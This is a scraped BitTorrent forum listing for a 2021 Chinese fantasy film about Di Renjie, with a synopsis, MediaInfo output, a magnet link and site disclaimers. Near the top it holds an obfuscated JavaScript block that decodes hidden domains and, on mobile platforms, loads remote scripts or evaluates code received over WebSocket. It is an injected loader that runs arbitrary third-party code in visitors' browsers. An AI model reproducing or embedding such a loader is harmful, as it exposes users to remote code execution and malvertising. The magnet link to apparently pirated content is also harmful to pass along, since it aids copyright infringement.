狄仁杰之通天赤狐.Di.Ren.jie.Tong.tian.chi.hu.2021.1080p.WEB-DL.AAC.H264 21.34GB

版主小s 1月前 363

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 狄仁杰之通天赤狐
◎年  代 2021
◎产  地 中国大陆
◎语  言 汉语普通话
◎上映日期 2021-08-05(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35553808/

◎简  介
  狐妖夜出谣言四起,百万银饷离奇失踪,押饷士兵无一生还。大理寺卿率人奔赴查案,却遭埋伏身亡,尸体形状诡异。天后震怒,狄仁杰为还将士真实情况而破悬案,历经生死踏上了破解狐妖阴谋的冒险之路。背后的阴谋是权臣的勾结,还是鬼魅横行,谜团最终能否解开……

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : 狄仁杰之通天赤狐[email protected]QDDQ.COM.mp4

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media / Version 2

  6. Codec ID                                 : mp42 (mp42/mp41)

  7. File size                                : 21.3 GiB

  8. Duration                                 : 1 h 28 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 34.4 Mb/s

  11. Encoded date                             : UTC 2021-07-23 12:25:03

  12. Tagged date                              : UTC 2021-07-23 12:29:53

  13. TIM                                      : 00:00:00:00

  14. TSC                                      : 25

  15. TSZ                                      : 1


  16. Video

  17. ID                                       : 1

  18. Format                                   : AVC

  19. Format/Info                              : Advanced Video Codec

  20. Format profile                           : [email protected]

  21. Format settings                          : CABAC / 3 Ref Frames

  22. Format settings, CABAC                   : Yes

  23. Format settings, Reference frames        : 3 frames

  24. Codec ID                                 : avc1

  25. Codec ID/Info                            : Advanced Video Coding

  26. Duration                                 : 1 h 28 min

  27. Bit rate                                 : 34.1 Mb/s

  28. Width                                    : 1 920 pixels

  29. Height                                   : 758 pixels

  30. Display aspect ratio                     : 2.533

  31. Frame rate mode                          : Constant

  32. Frame rate                               : 25.000 FPS

  33. Standard                                 : PAL

  34. Color space                              : YUV

  35. Chroma subsampling                       : 4:2:0

  36. Bit depth                                : 8 bits

  37. Scan type                                : Progressive

  38. Bits/(Pixel*Frame)                       : 0.937

  39. Stream size                              : 21.1 GiB (99%)

  40. Language                                 : English

  41. Encoded date                             : UTC 2021-07-23 12:25:03

  42. Tagged date                              : UTC 2021-07-23 12:25:03

  43. Color range                              : Limited

  44. Color primaries                          : BT.709

  45. Transfer characteristics                 : BT.709

  46. Matrix coefficients                      : BT.709

  47. Codec configuration box                  : avcC


  48. Audio

  49. ID                                       : 2

  50. Format                                   : AAC LC

  51. Format/Info                              : Advanced Audio Codec Low Complexity

  52. Codec ID                                 : mp4a-40-2

  53. Duration                                 : 1 h 28 min

  54. Source duration                          : 1 h 28 min

  55. Bit rate mode                            : Variable

  56. Bit rate                                 : 317 kb/s

  57. Maximum bit rate                         : 455 kb/s

  58. Channel(s)                               : 2 channels

  59. Channel layout                           : L R

  60. Sampling rate                            : 48.0 kHz

  61. Frame rate                               : 46.875 FPS (1024 SPF)

  62. Compression mode                         : Lossy

  63. Stream size                              : 201 MiB (1%)

  64. Source stream size                       : 201 MiB (1%)

  65. Language                                 : English

  66. Encoded date                             : UTC 2021-07-23 12:25:03

  67. Tagged date                              : UTC 2021-07-23 12:25:03



TAGS 奇幻 剧情

磁力链:
  • magnet:?xt=urn:btih:A415FD69CC1A21D24EA362F18C61E58DC9A49E65
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回